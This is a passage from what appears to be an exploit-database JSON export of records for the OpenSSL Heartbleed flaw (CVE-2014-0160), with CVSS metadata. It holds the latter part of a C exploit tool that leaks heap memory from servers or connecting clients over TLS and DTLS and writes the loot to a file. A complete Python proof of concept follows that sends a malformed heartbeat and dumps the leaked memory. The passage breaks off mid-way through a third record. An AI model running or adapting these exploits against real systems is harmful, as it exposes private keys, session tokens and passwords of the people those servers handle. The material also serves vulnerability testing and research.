al=SSL_AD_RECORD_OVERFLOW;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\n goto 
apple;\n }\n rr->off=0;\n s->packet_length=0;\n\tif(first==0){\n\t\tuint heartbleed_len = 0;\n\t\tchar* fp = s->s3->rrec.data;\n\t\t(long)fp++;\n\t\tmemcpy(&heartbleed_len,fp,2);\n\t\theartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\n\t\tfirst = 2;\n\t\tleakbytes = heartbleed_len + 16;\n\t\tprintf(\"[ heartbleed leaked length=%u\\n\",heartbleed_len);\n\t}\n\tif(verbose==1){\n\t\t{ unsigned int z; for (z=0; z<rr->length; z++) printf(\"%02X%c\",rr->data[z],((z+1)%16)?' ':'\\n'); }\n printf(\"\\n\");\n }\n\tleakbytes-=rr->length;\n\tif(leakbytes > 0){\n\t\trepeat = 1;\n\t}\n\telse{\n\t\trepeat = 0;\n\t}\n\tprintf(\"[ final record type=%d, length=%u\\n\", rr->type, rr->length);\n\tint output = s->s3->rrec.length-3;\n\tif(output > 0){\n\t\tint fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\n\t if(first==2){\n\t\t\tfirst--;\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\n\t\t\t/* first three bytes are resp+len */\n\t\t\tprintf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length-3,filename);\n\t\t}\n\t\telse{\n\t\t\t/* heap data & 16 bytes padding */\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\n\t\t\tprintf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length,filename);\n\t\t}\n\t\tclose(fd);\n\t}\n\telse{\n\t\tprintf(\"[ nothing from the heap to write\\n\");\n\t}\n\treturn;\napple:\n printf(\"[ problem handling SSL record packet - wrong type?\\n\");\n\tbadpackets++;\n\tif(badpackets > 3){\n\t\tprintf(\"[ error: too many bad packets recieved\\n\");\n\t\texit(0);\n\t}\n\treturn;\n}\n\n\nvoid* dtlssneakyleaky(connection *c,char* filename, int verbose){\n\tchar *p;\n int ssl_major,ssl_minor,al;\n int enc_err,n,i;\n SSL3_RECORD *rr;\n SSL_SESSION *sess;\n\tSSL* s;\n\tDTLS1_BITMAP *bitmap;\n\tunsigned int is_next_epoch;\n unsigned char md[EVP_MAX_MD_SIZE];\n short version;\n unsigned int mac_size, orig_len;\n\n rr= &(c->sslHandle->s3->rrec);\n sess=c->sslHandle->session;\n s = 
c->sslHandle;\n\nagain:\n if ((s->rstate != SSL_ST_READ_BODY) ||\n (s->packet_length < DTLS1_RT_HEADER_LENGTH)) {\n n=ssl3_read_n(s, DTLS1_RT_HEADER_LENGTH, s->s3->rbuf.len, 0);\n if (n <= 0)\n goto apple; \n\n s->rstate=SSL_ST_READ_BODY;\n p=s->packet;\n rr->type= *(p++);\n ssl_major= *(p++);\n ssl_minor= *(p++);\n version=(ssl_major<<8)|ssl_minor;\n\t\t\tn2s(p,rr->epoch);\n\t\t\tmemcpy(&(s->s3->read_sequence[2]), p, 6);\n\t\t\tp+=6;\n n2s(p,rr->length);\n\t\t\tif(rr->type==24){\n\t\t\t\tprintf(\"[ heartbeat returned type=%d length=%u\\n\",rr->type, rr->length);\n\t\t\t\tif(rr->length > 16834){\n\t\t\t\t\tprintf(\"[ error: got a malformed TLS length.\\n\");\n\t\t\t\t\texit(0);\n\t\t\t\t}\n\t\t\t}\n\t\t\telse{\n\t\t\t\tprintf(\"[ incorrect record type=%d length=%u returned\\n\",rr->type,rr->length);\n\t\t\t\ts->packet_length=0;\n\t\t\t\tbadpackets++;\n\t\t\t\tif(badpackets > 3){\n\t\t\t\t\tprintf(\"[ error: too many bad packets recieved\\n\");\n\t\t\t\t\texit(0);\n\t\t\t\t}\n\t\t\t\tgoto apple;\n\t\t\t}\n }\n\n if (rr->length > s->packet_length-DTLS1_RT_HEADER_LENGTH){\n i=rr->length;\n n=ssl3_read_n(s,i,i,1);\n if (n <= 0) goto apple; \n }\n\t\tif ( n != i)\n\t\t\t{\n\t\t\trr->length = 0;\n\t\t\ts->packet_length = 0;\n\t\t\tgoto again;\n\t\t\t}\n\tprintf(\"[ decrypting SSL packet\\n\");\n s->rstate=SSL_ST_READ_HEADER; \n\n\tbitmap = dtls1_get_bitmap(s, rr, &is_next_epoch);\n\tif ( bitmap == NULL)\n\t\t{\n\t\trr->length = 0;\n\t\ts->packet_length = 0;\n\t\tgoto again;\n\t\t}\n\n\t\tif (!(s->d1->listen && rr->type == SSL3_RT_HANDSHAKE &&\n\t\t *p == SSL3_MT_CLIENT_HELLO) &&\n\t\t !dtls1_record_replay_check(s, bitmap))\n\t\t\t{\n\t\t\trr->length = 0;\n\t\t\ts->packet_length=0;\n\t\t\tgoto again;\n\t\t\t}\n\n\tif (rr->length == 0) goto again;\nif (is_next_epoch)\n\t\t{\n\t\tif ((SSL_in_init(s) || s->in_handshake) && !s->d1->listen)\n\t\t\t{\n\t\t\tdtls1_buffer_record(s, &(s->d1->unprocessed_rcds), rr->seq_num);\n\t\t\t}\n\t\trr->length = 0;\n\t\ts->packet_length = 
0;\n\t\tgoto again;\n\t\t}\n\n\n rr->input= &(s->packet[DTLS1_RT_HEADER_LENGTH]);\n rr->data=rr->input;\n\torig_len=rr->length;\n\n dtls1_enc(s,0);\n\n if((sess != NULL) &&\n (s->enc_read_ctx != NULL) &&\n (EVP_MD_CTX_md(s->read_hash) != NULL))\n {\n unsigned char *mac = NULL;\n unsigned char mac_tmp[EVP_MAX_MD_SIZE];\n mac_size=EVP_MD_CTX_size(s->read_hash);\n OPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE);\n orig_len = rr->length+((unsigned int)rr->type>>8);\n if(orig_len < mac_size ||\n (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE &&\n orig_len < mac_size+1)){\n al=SSL_AD_DECODE_ERROR;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT);\n }\n if (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){\n mac = mac_tmp;\n ssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len);\n rr->length -= mac_size;\n }\n else{\n rr->length -= mac_size;\n mac = &rr->data[rr->length];\n }\n i = tls1_mac(s,md,0);\n\n if (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0)\n enc_err = -1;\n\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+mac_size)\n enc_err = -1;\n }\n if(enc_err < 0){\n al=SSL_AD_BAD_RECORD_MAC;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC);\n goto apple;\n }\n if(s->expand != NULL){\n if (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH) {\n al=SSL_AD_RECORD_OVERFLOW;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG);\n goto apple;\n }\n if (!ssl3_do_uncompress(s)) {\n al=SSL_AD_DECOMPRESSION_FAILURE;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION);\n goto apple;\n }\n }\n\n if (rr->length > SSL3_RT_MAX_PLAIN_LENGTH) {\n al=SSL_AD_RECORD_OVERFLOW;\n SSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG);\n goto apple;\n }\n rr->off=0;\n s->packet_length=0;\n\tdtls1_record_bitmap_update(s, &(s->d1->bitmap));\n\tif(first==0){\n\t\tuint heartbleed_len = 0;\n\t\tchar* fp = s->s3->rrec.data;\n\t\t(long)fp++;\n\t\tmemcpy(&heartbleed_len,fp,2);\n\t\theartbleed_len = (heartbleed_len & 
0xff) << 8 | (heartbleed_len & 0xff00) >> 8;\n\t\tfirst = 2;\n\t\tleakbytes = heartbleed_len + 16;\n\t\tprintf(\"[ heartbleed leaked length=%u\\n\",heartbleed_len);\n\t}\n\tif(verbose==1){\n\t\t{ unsigned int z; for (z=0; z<rr->length; z++) printf(\"%02X%c\",rr->data[z],((z+1)%16)?' ':'\\n'); }\n printf(\"\\n\");\n }\n\tleakbytes-=rr->length;\n\tif(leakbytes > 0){\n\t\trepeat = 1;\n\t}\n\telse{\n\t\trepeat = 0;\n\t}\n\tprintf(\"[ final record type=%d, length=%u\\n\", rr->type, rr->length);\n\tint output = s->s3->rrec.length-3;\n\tif(output > 0){\n\t\tint fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700);\n\t if(first==2){\n\t\t\tfirst--;\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\n\t\t\t/* first three bytes are resp+len */\n\t\t\tprintf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length-3,filename);\n\t\t}\n\t\telse{\n\t\t\t/* heap data & 16 bytes padding */\n\t\t\twrite(fd,s->s3->rrec.data+3,s->s3->rrec.length);\n\t\t\tprintf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length,filename);\n\t\t}\n\t\tclose(fd);\n\t}\n\telse{\n\t\tprintf(\"[ nothing from the heap to write\\n\");\n\t}\n\n\t\t\tdtls1_stop_timer(c->sslHandle);\n\t\t\tc->sslHandle->tlsext_hb_seq++;\n\t\t\tc->sslHandle->tlsext_hb_pending = 0;\n\n\treturn;\napple:\n printf(\"[ problem handling SSL record packet - wrong type?\\n\");\n\tbadpackets++;\n\tif(badpackets > 3){\n\t\tprintf(\"[ error: too many bad packets recieved\\n\");\n\t\texit(0);\n\t}\n\treturn;\n}\n\nstatic DTLS1_BITMAP *\ndtls1_get_bitmap(SSL *s, SSL3_RECORD *rr, unsigned int *is_next_epoch)\n {\n \n *is_next_epoch = 0;\n\n if (rr->epoch == s->d1->r_epoch)\n return &s->d1->bitmap;\n\n else if (rr->epoch == (unsigned long)(s->d1->r_epoch + 1) &&\n (rr->type == SSL3_RT_HANDSHAKE ||\n rr->type == SSL3_RT_ALERT))\n {\n *is_next_epoch = 1;\n return &s->d1->next_bitmap;\n }\n\n return NULL;\n }\n\nstatic int dtls1_record_replay_check(SSL *s, DTLS1_BITMAP *bitmap)\n\t{\n\tint cmp;\n\tunsigned int 
shift;\n\tconst unsigned char *seq = s->s3->read_sequence;\n\n\tcmp = satsub64be(seq,bitmap->max_seq_num);\n\tif (cmp > 0)\n\t\t{\n\t\tmemcpy (s->s3->rrec.seq_num,seq,8);\n\t\treturn 1;\n\t\t}\n\tshift = -cmp;\n\tif (shift >= sizeof(bitmap->map)*8)\n\t\treturn 0;\n\telse if (bitmap->map & (1UL<<shift))\n\t\treturn 0;\n\n\tmemcpy (s->s3->rrec.seq_num,seq,8);\n\treturn 1;\n\t}\n\nint satsub64be(const unsigned char *v1,const unsigned char *v2)\n{\tint ret,sat,brw,i;\n\n\tif (sizeof(long) == 8) do\n\t{\tconst union { long one; char little; } is_endian = {1};\n\t\tlong l;\n\n\t\tif (is_endian.little)\t\t\tbreak;\n\n\t\tif (((size_t)v1|(size_t)v2)&0x7)\tbreak;\n\n\t\tl = *((long *)v1);\n\t\tl -= *((long *)v2);\n\t\tif (l>128)\t\treturn 128;\n\t\telse if (l<-128)\treturn -128;\n\t\telse\t\t\treturn (int)l;\n\t} while (0);\n\n\tret = (int)v1[7]-(int)v2[7];\n\tsat = 0;\n\tbrw = ret>>8;\n\tif (ret & 0x80)\n\t{\tfor (i=6;i>=0;i--)\n\t\t{\tbrw += (int)v1[i]-(int)v2[i];\n\t\t\tsat |= ~brw;\n\t\t\tbrw >>= 8;\n\t\t}\n\t}\n\telse\n\t{\tfor (i=6;i>=0;i--)\n\t\t{\tbrw += (int)v1[i]-(int)v2[i];\n\t\t\tsat |= brw;\n\t\t\tbrw >>= 8;\n\t\t}\n\t}\n\tbrw <<= 8;\n\n\tif (sat&0xff)\treturn brw | 0x80;\n\telse\t\treturn brw + (ret&0xFF);\n}\n\nstatic int\ndtls1_buffer_record(SSL *s, record_pqueue *queue, unsigned char *priority)\n\t{\n\tDTLS1_RECORD_DATA *rdata;\n\tpitem *item;\n\n\tif (pqueue_size(queue->q) >= 100)\n\t\treturn 0;\n\t\t\n\trdata = OPENSSL_malloc(sizeof(DTLS1_RECORD_DATA));\n\titem = pitem_new(priority, rdata);\n\tif (rdata == NULL || item == NULL)\n\t\t{\n\t\tif (rdata != NULL) OPENSSL_free(rdata);\n\t\tif (item != NULL) pitem_free(item);\n\t\t\n\t\tSSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);\n\t\treturn(0);\n\t\t}\n\t\n\trdata->packet = s->packet;\n\trdata->packet_length = s->packet_length;\n\tmemcpy(&(rdata->rbuf), &(s->s3->rbuf), sizeof(SSL3_BUFFER));\n\tmemcpy(&(rdata->rrec), &(s->s3->rrec), sizeof(SSL3_RECORD));\n\n\titem->data = rdata;\n\n#ifndef 
OPENSSL_NO_SCTP\n\tif (BIO_dgram_is_sctp(SSL_get_rbio(s)) &&\n\t (s->state == SSL3_ST_SR_FINISHED_A || s->state == SSL3_ST_CR_FINISHED_A)) {\n\t\tBIO_ctrl(SSL_get_rbio(s), BIO_CTRL_DGRAM_SCTP_GET_RCVINFO, sizeof(rdata->recordinfo), &rdata->recordinfo);\n\t}\n#endif\n\n\tif (pqueue_insert(queue->q, item) == NULL)\n\t\t{\n\t\tOPENSSL_free(rdata);\n\t\tpitem_free(item);\n\t\treturn(0);\n\t\t}\n\n\ts->packet = NULL;\n\ts->packet_length = 0;\n\tmemset(&(s->s3->rbuf), 0, sizeof(SSL3_BUFFER));\n\tmemset(&(s->s3->rrec), 0, sizeof(SSL3_RECORD));\n\t\n\tif (!ssl3_setup_buffers(s))\n\t\t{\n\t\tSSLerr(SSL_F_DTLS1_BUFFER_RECORD, ERR_R_INTERNAL_ERROR);\n\t\tOPENSSL_free(rdata);\n\t\tpitem_free(item);\n\t\treturn(0);\n\t\t}\n\t\n\treturn(1);\n\t}\n\n\nstatic void dtls1_record_bitmap_update(SSL *s, DTLS1_BITMAP *bitmap)\n\t{\n\tint cmp;\n\tunsigned int shift;\n\tconst unsigned char *seq = s->s3->read_sequence;\n\n\tcmp = satsub64be(seq,bitmap->max_seq_num);\n\tif (cmp > 0)\n\t\t{\n\t\tshift = cmp;\n\t\tif (shift < sizeof(bitmap->map)*8)\n\t\t\tbitmap->map <<= shift, bitmap->map |= 1UL;\n\t\telse\n\t\t\tbitmap->map = 1UL;\n\t\tmemcpy(bitmap->max_seq_num,seq,8);\n\t\t}\n\telse\t{\n\t\tshift = -cmp;\n\t\tif (shift < sizeof(bitmap->map)*8)\n\t\t\tbitmap->map |= 1UL<<shift;\n\t\t}\n\t}\n\n\nvoid usage(){\n\tprintf(\"[\\n\");\n\tprintf(\"[ --server|-s <ip/dns> - the server to target\\n\");\n\tprintf(\"[ --port|-p <port> - the port to target\\n\");\n\tprintf(\"[ --file|-f <filename> - file to write data to\\n\");\n\tprintf(\"[ --bind|-b <ip> - bind to ip for exploiting clients\\n\");\n\tprintf(\"[ --precmd|-c <n> - send precmd buffer (STARTTLS)\\n\");\n\tprintf(\"[\t\t\t 0 = SMTP\\n\");\n\tprintf(\"[\t\t\t 1 = POP3\\n\");\n\tprintf(\"[\t\t\t 2 = IMAP\\n\");\n\tprintf(\"[ --loop|-l\t\t - loop the exploit attempts\\n\");\n\tprintf(\"[ --type|-t <n> - select exploit to try\\n\");\n\tprintf(\"[ 0 = null length\\n\");\n\tprintf(\"[\t\t\t 1 = max leak\\n\");\n\tprintf(\"[\t\t\t n = heartbeat 
payload_length\\n\");\n\tprintf(\"[ --udp|-u - use dtls/udp\\n\");\n\tprintf(\"[\\n\");\n\tprintf(\"[ --verbose|-v - output leak to screen\\n\");\n\tprintf(\"[ --help|-h - this output\\n\");\n\tprintf(\"[\\n\");\n\texit(0);\n}\n\nint main(int argc, char* argv[]){\n\tint ret, port, userc, index;\n\tint type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9;\n\tint loop = 0;\n\tstruct hostent *h;\n\tconnection* c;\n\tchar *host, *file;\n\tint ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0;\n\tprintf(\"[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\\n\");\n\tprintf(\"[ =============================================================\\n\");\n static struct option options[] = {\n \t{\"server\", 1, 0, 's'},\n\t {\"port\", 1, 0, 'p'},\n\t\t{\"file\", 1, 0, 'f'},\n\t\t{\"type\", 1, 0, 't'},\n\t\t{\"bind\", 1, 0, 'b'},\n\t\t{\"verbose\", 0, 0, 'v'},\n\t\t{\"precmd\", 1, 0, 'c'},\n\t\t{\"loop\", 0, 0, 'l'},\n\t\t{\"help\", 0, 0,'h'},\n\t\t{\"udp\", 0, 0, 'u'}\n };\n\twhile(userc != -1) {\n\t userc = getopt_long(argc,argv,\"s:p:f:t:b:c:lvhu\",options,&index);\t\n \tswitch(userc) {\n \t\tcase -1:\n\t break;\n \t case 's':\n\t\t\t\tif(ihost==0){\n\t\t\t\t\tihost = 1;\n\t\t\t\t\th = gethostbyname(optarg);\t\t\t\t\n\t\t\t\t\tif(h==NULL){\n\t\t\t\t\t\tprintf(\"[!] 
FATAL: unknown host '%s'\\n\",optarg);\n\t\t\t\t\t\texit(1);\n\t\t\t\t\t}\n\t\t\t\t\thost = malloc(strlen(optarg) + 1);\n\t\t\t\t\tif(host==NULL){\n \t\t\t\tprintf(\"[ error in malloc()\\n\");\n\t\t\t\t exit(0);\n \t\t\t\t}\n\t\t\t\t\tsprintf(host,\"%s\",optarg);\n \t\t\t}\n\t\t\t\tbreak;\n\t case 'p':\n\t\t\t\tif(iport==0){\n\t\t\t\t\tport = atoi(optarg);\n\t\t\t\t\tiport = 1;\n\t\t\t\t}\n \t break;\n\t\t\tcase 'f':\n\t\t\t\tif(ifile==0){\n\t\t\t\t\tfile = malloc(strlen(optarg) + 1);\n\t\t\t\t\tif(file==NULL){\n\t\t\t\t printf(\"[ error in malloc()\\n\");\n \t\t\t\texit(0);\n \t\t\t\t}\n\t\t\t\t\tsprintf(file,\"%s\",optarg);\n\t\t\t\t\tifile = 1;\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase 't':\n\t\t\t\tif(itype==0){\n\t\t\t\t\ttype = atoi(optarg);\n\t\t\t\t\titype = 1;\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase 'h':\n\t\t\t\tusage();\n\t\t\t\tbreak;\n\t\t\tcase 'b':\n\t\t\t\tif(ihost==0){\n\t\t\t\t\tihost = 1;\n\t\t\t\t\thost = malloc(strlen(optarg)+1);\n\t\t\t\t\tif(host==NULL){\n\t\t\t \t printf(\"[ error in malloc()\\n\");\n\t\t\t\t exit(0);\n\t\t\t\t }\n\t\t\t\t\tsprintf(host,\"%s\",optarg);\n\t\t\t\t\tbind = 1;\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase 'c':\n\t\t\t\tif(iprecmd == 0){\n\t\t\t\t\tiprecmd = 1;\n\t\t\t\t\tprecmd = atoi(optarg);\n\t\t\t\t}\n\t\t\t\tbreak;\n\t\t\tcase 'v':\n\t\t\t\tverbose = 1;\n\t\t\t\tbreak;\n\t\t\tcase 'l':\n\t\t\t\tloop = 1;\n\t\t\t\tbreak;\n \t case 'u':\n\t\t\t\tudp = 1;\n\t\t\t\tbreak;\n\n\t\t\tdefault:\n\t\t\t\tbreak;\n\t\t}\n\t}\n\tif(ihost==0||iport==0||ifile==0||itype==0){\n\t\tprintf(\"[ try --help\\n\");\n\t\texit(0);\n\t}\n\tssl_init();\n\tif(bind==0){\n\t\tif (udp){\n\t\t\tc = dtls_client(ret, host, port);\n\t\t\tdtlsheartbleed(c, type);\n\t\t\tdtlssneakyleaky(c,file,verbose);\n\t\t\twhile(repeat==1){\n\t\t\t\tdtlssneakyleaky(c,file,verbose);\n\t\t\t}\n\t\t\twhile(loop==1){\n\t\t\t\tprintf(\"[ entered heartbleed 
loop\\n\");\n\t\t\t\tfirst=0;\n\t\t\t\trepeat=1;\n\t\t\t\tdtlsheartbleed(c,type);\n\t\t\t\twhile(repeat==1){\n\t\t\t\t\tdtlssneakyleaky(c,file,verbose);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\telse {\n\t\t\tret = tcp_connect(host, port);\n\t\t\tpre_cmd(ret, precmd, verbose);\n\t\t\tc = tls_connect(ret);\n\t\t\theartbleed(c,type);\n\t\t\twhile(repeat==1){\n\t\t\t\tsneakyleaky(c,file,verbose);\n\t\t\t}\n\t\t\twhile(loop==1){\n\t\t\t\tprintf(\"[ entered heartbleed loop\\n\");\n\t\t\t\tfirst=0;\n\t\t\t\trepeat=1;\n\t\t\t\theartbleed(c,type);\n\t\t\t\twhile(repeat==1){\n\t\t\t\t\tsneakyleaky(c,file,verbose);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tSSL_shutdown(c->sslHandle);\n\t\tclose (ret);\n\t\tSSL_free(c->sslHandle);\n\t}\n\telse{\n\t\tint sd, pid, i;\n\t\tif (udp) {\n\t\t\tc = dtls_server(sd, host, port);\n\t\t\twhile (1) {\n\t\t\t\tchar * bytes = malloc(1024);\n\t\t\t\tstruct sockaddr_in peer;\n\t\t\t\tsocklen_t len = sizeof(peer);\n\t\t\t\t\tif (recvfrom(c->socket,bytes,1023,0,(struct sockaddr *)&peer,&len) > 0) {\n\t\t\t\t\tdtlsheartbleed(c,type);\n\t\t\t\t\tdtlssneakyleaky(c,file,verbose);\n\t\t\t\t\t\twhile(loop==1){\n\t\t\t\t\t\t\tprintf(\"[ entered heartbleed loop\\n\");\n\t\t\t\t\t\t\tfirst=0;\n\t\t\t\t\t\t\trepeat=0;\n\t\t\t\t\t\t\tdtlsheartbleed(c,type);\n\t\t\t\t\t\t\twhile(repeat==1){\n\t\t\t\t\t\t\t\tdtlssneakyleaky(c,file,verbose);\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\telse {\n\t\t\tret = tcp_bind(host, port);\n\t\t\twhile(1){\n\t \t\t\tsd=accept(ret,0,0);\n\t\t\t\tif(sd==-1){\n\t\t\t\t\tprintf(\"[!] 
FATAL: problem with accept()\\n\");\n\t\t\t\t\texit(0);\n\t\t\t\t}\n\t\t\t\tif(pid=fork()){\n\t\t\t\t\tclose(sd);\n\t\t\t\t}\n\t \t\t\telse{\n\t\t\t\t\tc = tls_bind(sd);\n\t\t\t\t\tpre_cmd(ret, precmd, verbose);\n\t\t\t\t\theartbleed(c,type);\n\t\t\t\t\twhile(repeat==1){\n\t\t\t\t\t\tsneakyleaky(c,file,verbose);\n\t\t\t\t\t}\n\t\t\t\t\twhile(loop==1){\n\t\t\t\t\t\tprintf(\"[ entered heartbleed loop\\n\");\n\t\t\t\t\t\tfirst=0;\n\t\t\t\t\t\trepeat=0;\n\t\t\t\t\t\theartbleed(c,type);\n\t\t\t\t\t\twhile(repeat==1){\n\t\t\t\t\t\t\tsneakyleaky(c,file,verbose);\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\tprintf(\"[ done.\\n\");\n\t\t\t\t\texit(0);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-01T19:04:39", "description": "\nOpenSSL TLS Heartbeat Extension - Heartbleed Memory Disclosure", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2014-04-08T00:00:00", "title": "OpenSSL TLS Heartbeat Extension - Heartbleed Memory Disclosure", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-08T00:00:00", 
"id": "EXPLOITPACK:596E856FF8E5B47CBB4EE985B0B99685", "href": "", "sourceData": "#!/usr/bin/python\n\n# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)\n# The author disclaims copyright to this source code.\n\nimport sys\nimport struct\nimport socket\nimport time\nimport select\nimport re\nfrom optparse import OptionParser\n\noptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')\noptions.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')\n\ndef h2bin(x):\n return x.replace(' ', '').replace('\\n', '').decode('hex')\n\nhello = h2bin('''\n16 03 02 00 dc 01 00 00 d8 03 02 53\n43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf\nbd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00\n00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88\n00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c\nc0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09\nc0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44\nc0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c\nc0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11\n00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04\n03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19\n00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08\n00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13\n00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00\n00 0f 00 01 01 \n''')\n\nhb = h2bin(''' \n18 03 02 00 03\n01 40 00\n''')\n\ndef hexdump(s):\n for b in xrange(0, len(s), 16):\n lin = [c for c in s[b : b + 16]]\n hxdat = ' '.join('%02X' % ord(c) for c in lin)\n pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' 
)for c in lin)\n print ' %04x: %-48s %s' % (b, hxdat, pdat)\n print\n\ndef recvall(s, length, timeout=5):\n endtime = time.time() + timeout\n rdata = ''\n remain = length\n while remain > 0:\n rtime = endtime - time.time() \n if rtime < 0:\n return None\n r, w, e = select.select([s], [], [], 5)\n if s in r:\n data = s.recv(remain)\n # EOF?\n if not data:\n return None\n rdata += data\n remain -= len(data)\n return rdata\n \n\ndef recvmsg(s):\n hdr = recvall(s, 5)\n if hdr is None:\n print 'Unexpected EOF receiving record header - server closed connection'\n return None, None, None\n typ, ver, ln = struct.unpack('>BHH', hdr)\n pay = recvall(s, ln, 10)\n if pay is None:\n print 'Unexpected EOF receiving record payload - server closed connection'\n return None, None, None\n print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))\n return typ, ver, pay\n\ndef hit_hb(s):\n s.send(hb)\n while True:\n typ, ver, pay = recvmsg(s)\n if typ is None:\n print 'No heartbeat response received, server likely not vulnerable'\n return False\n\n if typ == 24:\n print 'Received heartbeat response:'\n hexdump(pay)\n if len(pay) > 3:\n print 'WARNING: server returned more data than it should - server is vulnerable!'\n else:\n print 'Server processed malformed heartbeat, but did not return any extra data.'\n return True\n\n if typ == 21:\n print 'Received alert:'\n hexdump(pay)\n print 'Server returned error, likely not vulnerable'\n return False\n\ndef main():\n opts, args = options.parse_args()\n if len(args) < 1:\n options.print_help()\n return\n\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n print 'Connecting...'\n sys.stdout.flush()\n s.connect((args[0], opts.port))\n print 'Sending Client Hello...'\n sys.stdout.flush()\n s.send(hello)\n print 'Waiting for Server Hello...'\n sys.stdout.flush()\n while True:\n typ, ver, pay = recvmsg(s)\n if typ == None:\n print 'Server closed connection without sending Server Hello.'\n return\n # Look for 
server hello done message.\n if typ == 22 and ord(pay[0]) == 0x0E:\n break\n\n print 'Sending heartbeat request...'\n sys.stdout.flush()\n s.send(hb)\n hit_hb(s)\n\nif __name__ == '__main__':\n main()", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-01T19:04:39", "description": "\nOpenSSL 1.0.1f TLS Heartbeat Extension - Heartbleed Memory Disclosure (Multiple SSLTLS Versions)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2014-04-09T00:00:00", "title": "OpenSSL 1.0.1f TLS Heartbeat Extension - Heartbleed Memory Disclosure 